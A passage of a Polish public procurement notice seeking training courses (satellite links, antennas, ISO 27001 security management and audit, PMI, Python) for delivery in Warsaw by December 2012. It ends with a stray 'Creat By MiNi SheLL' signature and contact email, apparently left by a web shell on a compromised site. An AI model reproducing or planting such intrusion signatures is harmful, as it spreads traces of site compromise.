C) Standard TETRA
a)	architektura sieci (V + D);
b)	standardowe interfejsy;
c)	tryb trankingowy (TMO) / tryb bezpośredni (DMO);
d)	standardowe usługi, typowe aplikacje;
e)	interoperacyjność - certyfikacja;
f)	ewolucja standardu -TETRA Release 2 (TEDS);
D) Standard DMR (Digital Mobile Radio)
a) właściwości systemu;
b) porównanie DMR-TETRA.
E) Usługa PoC (Push to Talk over Cellular) w sieciach publicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Łączność satelitarna..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Czas trwania szkolenia - 2 dni z wyłączeniem dni ustawowo wolnych od pracy (16 godzin szkoleniowych);
2.	Szkolenie zakończone - otrzymaniem przez szkolonych stosownego certyfikatu/ zaświadczenia;
3.	Ilość szkolonych - 3 osoby;
4.	Miejsce - na terenie miasta stołecznego Warszawa;
5.	Zabezpieczenie szkolenia - miejsce szkolenia (sala wykładowa, sala do treningów), materiały szkoleniowe, sprzęt - zabezpiecza prowadzący szkolenie;

6.	Zagadnienia szkoleniowe: 
1)	Zapoznanie uczestników szkolenia z  budową i działaniem systemów satelitarnych tj.: powstanie, rozwój i architektura systemów satelitarnych, uregulowania prawne, geometria i mechanika systemów satelitarnych, rodzaje orbit satelitów ziemi oraz zastosowania systemów satelitarnych;
2)	Przedstawienie uczestnikom szkolenia segmentu kosmicznego:
a)	 budowa i rodzaje satelitów, wynoszenie satelity na orbitę, stabilizacja położenia
 satelitów na orbicie;
b)	 segmentu naziemnego (stacje naziemne - typy i budowa); 
3)	Zapoznanie z rodzajami i parametrami anten stosowanych w systemach satelitarnych oraz bilans energetyczny radiowego łącza satelitarnego (EIRP, moc odbierana sygnału użytecznego, współczynnik przydatności G/T urządzenia odbiorczego, wpływ atmosfery i innych czynników na transmisję sygnału w łączu satelitarnym);
4)	Omówienie rodzajów transmisji przesyłanych sygnałów (analogowa i cyfrowa), sposobów zwielokrotniania transmisji w kanale satelitarnym oraz różne rodzaje dostępu do wspólnych zasobów (FDMA, TDMA i CDMA);
5)	Omówienie zastosowania telekomunikacyjnych  systemów satelitarnych: radiokomunikacja stała, telewizja i radiofonia satelitarna, radiokomunikacja ruchoma, satelitarne systemy transmisji danych, Internet przez satelitę, systemy multimedialne, 
a także systemy radionawigacji ruchomej i lądowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Anteny radiokomunikacyjne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Czas trwania szkolenia - 2 dni z wyłączeniem dni ustawowo wolnych od pracy (16 godzin szkoleniowych);
2.	Szkolenie zakończone - otrzymaniem przez szkolonych stosownego certyfikatu/ zaświadczenia;
3.	Ilość szkolonych - 2 osoby;
4.	Miejsce: na terenie miasta stołecznego Warszawa;
5.	Zabezpieczenie szkolenia: miejsce szkolenia (sala wykładowa, sala do treningów), materiały szkoleniowe, sprzęt - zabezpiecza prowadzący szkolenie;
6.	Zagadnienia szkoleniowe: 
1)	Zapoznanie uczestników szkolenia z  antenami radiokomunikacyjnymi;
2)	Omówienie podstawowych  parametrów technicznych anten stacji bazowych oraz anten stacji ruchomych;
3)	Przeszkolenie uczestników szkolenia z zagadnień dotyczących:
a)	systemów radiokomunikacji ruchomej lądowej;
b)	anten stacji ruchomych;
c)	odbioru przestrzennego (diversity);
d)	techniki wielo antenowe (MIMO);
e)	anten sterowanych (smart antenna);
f)	parametrów kabli antenowych;
g)	przyłączenia urządzeń radiowych do wspólnego toru antenowego: duplekser, diplekser, sumator (combiner) i rozdzielacz (splitter)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Szkolenie nr 1: Informatyczne aspekty zarządzania bezpieczeństwem informacji zgodnie z PN-ISO/IEC 27001:2007 i ISO IEC 27002:2007.
Szkolenie nr 2: Zarządzanie ryzykiem związanym z systemami informacyjnymi.
Szkolenie nr 3: Zarządzanie ciągłością działania.
Szkolenie nr 4: Audytor wewnętrzny systemu zarządzania bezpieczeństwem informacji zgodnie z PN-ISO/IEC 27001:2007..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Czas trwania szkolenia:
1)	Szkolenie nr 1: 5 dni dla każdego szkolenia z wyłączeniem dni ustawowo wolnych
od pracy (40 godzin szkoleniowych);
2)	Szkolenie nr 2: 2 dni dla każdego szkolenia z wyłączeniem dni ustawowo wolnych
od pracy (16 godzin szkoleniowych);
3)	Szkolenie nr 3: 1 dzień  z wyłączeniem dni ustawowo wolnych
od pracy (8 godzin szkoleniowych);
4)	Szkolenie nr 4: 3 dni dla każdego szkolenia z wyłączeniem dni ustawowo wolnych
od pracy (24 godziny szkoleniowe).
2.	Szkolenie zakończone:
1)	szkolenie nr: 1, 2, 3 - otrzymaniem przez szkolonych stosownego zaświadczenia;
2)	szkolenie nr 4 - otrzymaniem przez szkolonych stosownego certyfikatu audytora wewnętrznego systemu zarządzania bezpieczeństwem informacji. 
3.	Ilość szkolonych - 3 osoby w każdym szkoleniu;
4.	Termin szkolenia do - 4 propozycje terminów szkoleń (po jednym terminie dla każdego   uczestnika szkolenia w danym szkoleniu oraz jeden dodatkowy termin). Szkolenia muszą być zakończone do dnia 10.12.2012 r.;
5.	Miejsce - na terenie miasta stołecznego Warszawa;
6.	Zabezpieczenie szkolenia - miejsce szkolenia (sala wykładowa, sala do treningów), materiały szkoleniowe, sprzęt - zabezpiecza prowadzący szkolenie;
Zagadnienia do szkolenia nr 1: 
1)	Zapoznanie uczestników szkolenia z  rolą i znaczeniem systemu zarządzania bezpieczeństwem informacji;
2)	Budowa normy PN-ISO/IEC 27001:2007 oraz budowa polityki bezpieczeństwa informacji;
3)	Znaczenie i efekty wdrożenia systemu zarządzania bezpieczeństwem informacji zgodnie z wymogami norm PN-ISO/IEC 27001:2007 i ISO/IEC 27002:2007;
4)	Organizacja bezpieczeństwa informacji;
5)	Przeprowadzenie klasyfikacji oraz kontrola aktywów;
6)	Bezpieczeństwo osobowe oraz fizyczne i środowiskowe;
7)	Obszary związane z informatycznym aspektem zarządzania bezpieczeństwem;
8)	Zarządzanie incydentami oraz zarządzanie ciągłością działania;
9)	Zarządzanie systemami i sieciami zgodnie z wymogami norm ISO/IEC 27002:2007;
10)	Kontrola dostępu do systemu;
11)	Poruszanie w obszarze bezpieczeństwa informacji zgodnie z przepisami prawa; 
12)	Wdrażanie, monitorowanie i przeglądy oraz doskonalenie systemu zarządzania bezpieczeństwem informacji.
Zagadnienia do szkolenia nr 2: 
1)	Przedstawienie uczestnikom szkolenia, roli i znaczenie systemu zarządzania bezpieczeństwem informacji  zgodnie  z PN -ISO/IEC 27001:2007 i  ISO/IEC 27002:2007 w obszarze zarządzania bezpieczeństwem  informacji;
2)	Podstawowe definicje i założenia współczesnego podejścia do analizy i zarządzania ryzykiem;
3)	Informacje o zagrożeniach związanych z bezpieczeństwem informacji;
4)	Różne podejścia do analizy zarządzania bezpieczeństwem informacji;
5)	Analiza bezpieczeństwa informacji zgodnie z zaleceniami ISO/IEC TR 13335-2;
6)	Metody analizy bezpieczeństwa informacji;
7)	Struktura zarządzania ryzykiem (koncepcja, proces, model zarządzania ryzykiem 
w cyklu życia systemu);
8)	Znaczenie i wymagana dokumentacja przy prowadzeniu analizy zarządzania ryzykiem podczas wdrażania systemu zarządzania bezpieczeństwem informacji zgodnie z PN -ISO/IEC 27001:2007;
9)	Przygotowanie szkolonych do samodzielnego wdrożenia i nadzorowania systemu zarządzania bezpieczeństwem informacji.
Zagadnienia do szkolenia nr 3: 
1)	Zdefiniowanie i analiza scenariuszy wydarzeń i określenie konsekwencji;
2)	Analiza procesów, określenie parametrów ciągłości i wyznaczenie krytyczności;
3)	Znaczenie i przykłady zarządzania ciągłością działania oraz budowa planów awaryjnych;
4)	Zagrożenie związane z możliwością utraty ciągłością działania;
5)	Wybór rozwiązań zapewniających utrzymanie parametrów ciągłości procesów;
6)	Budowa, dokumentowanie i testowanie planów ciągłości działania;
7)	Postępowanie przy przywracaniu do stanu normalnego ciągłości działania;
8)	Miejsce zarządzania ciągłością działania we wdrażaniu systemu zarządzania bezpieczeństwem informacji zgodnie z wymaganiami norm PN-ISO/IEC 27001:2007
i ISO/IEC 27002:2007;
9)	Praktyczne przygotowanie elementów planów ciągłości działania.
Zagadnienia do szkolenia nr 4: 
1)	Zdefiniować i wyjaśnić cel systemu zarządzania bezpieczeństwem informacji (ISMS);
2)	Zdefiniować i wyjaśnić proces wykorzystania podczas tworzenia, wdrażania, prowadzenia monitorowania, analizy doskonalenia ISMS zgodnie z normą ISO 27001, z uwzględnieniem znaczenia tych procesów dla audytorów ISMS;
3)	Wyjaśnić cele, treść i wzajemne powiązania normy ISO 27001 z innymi powiązanymi standardami oraz strukturę legislacyjną dotyczącej ISMS;
4)	Zapoznać szkolonych o przebiegu audytu i procesu certyfikacji zgodnie z ISO 27001;
5)	Przeprowadzić audyty trzeciej strony według wymogów norm ISO 27001 dotyczących systemów zarządzania bezpieczeństwem informacji oraz zgłoszenia 
i śledzenia wyników;
6)	Planowanie, realizacja raportowanie audytów systemu zarządzania bezpieczeństwem informacji /przekazanie cennych wskazówek, praktycznych doświadczeń/;
7)	Ocena zdolności organizacji do zarządzania wszystkimi aspektami bezpieczeństwa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Szkolenie PMI..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Czas trwania szkolenia - 10 dni z wyłączeniem dni ustawowo wolnych od pracy (80 godzin szkoleniowych).
2.	Szkolenie zakończone - egzaminem w certyfikowanym ośrodku  oraz otrzymaniem przez szkolonych stosownego certyfikatu;
3.	Ilość szkolonych - 2 osoby;
4.	Miejsce - na terenie miasta stołecznego Warszawa;
5.	Zabezpieczenie szkolenia - miejsce szkolenia (sala wykładowa, sala do treningów), materiały szkoleniowe, sprzęt  oraz aktualną edycję podręcznika PMBOK Guide - zabezpiecza prowadzący szkolenie.
6.	Zagadnienia szkoleniowe: 
1)	Podstawowe pojęcia związane ze sztuką zarządzania projektami;
2)	Rola projektów w nowoczesnych organizacjach;
3)	Struktura organizacyjna a zarządzanie projektem;
4)	Cykl życia projektu, cykl życia zarządzaniem projektem;
5)	Projekty, programy, portfele projektów;
6)	Cechy skutecznego kierownika projektu;
7)	Zarządzanie interesariuszami projektu (ang. stakeholders management);
8)	Rola komunikacji w zarządzaniu projektami;
9)	Rozpoczęcie projektu w organizacji;
10)	Spotkanie początkowe;
11)	Budowanie zespołu projektowego;
12)	Tworzenie, wdrażanie oraz kontrola planów projektów;
13)	Zarządzanie zakresem projektu (struktura podziału pracy - WBS);
14)	Szacowanie czasu trwania oraz kosztów projektu;
15)	Wstęp do zarządzania ryzykiem projektowym;
16)	Realizacja projektu;
17)	Zarządzanie zespołem projektowym;
18)	Jakość w zarządzaniu projektami;
19)	Kontrola przebiegu projektu (technika wartości wypracowanej, ang. earned value technique);
20)	Zakończenie projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PYTHON Programming..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Czas trwania szkolenia - 4 dni z wyłączeniem dni ustawowo wolnych od pracy (32 godziny szkoleniowe).
2.	Szkolenie zakończone - otrzymaniem przez szkolonych stosownego certyfikatu/ zaświadczenia;
3.	Ilość szkolonych - 1 osoba;
4.	Miejsce - na terenie miasta stołecznego Warszawa;
5.	Zabezpieczenie szkolenia - miejsce szkolenia (sala wykładowa, sala do treningów), materiały szkoleniowe, sprzęt - zabezpiecza prowadzący szkolenie;
6.	Zagadnienia szkoleniowe: 
1)	Zapoznanie z językiem programowania PYTHON;
2)	Wbudowanie struktury danych;
3)	Składnia i zmienne;
4)	Pętle i wyrażenia warunkowe;
5)	Funkcje i moduły;
6)	Programowanie obiektowe;
7)	Obsługa wejścia i wyjścia;
8)	Narzędzia wbudowane;
9)	Budowa aplikacji z interfejsem graficznym;
10)	Obsługa wywołań systemowych;
11)	Wyrażenia regularne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com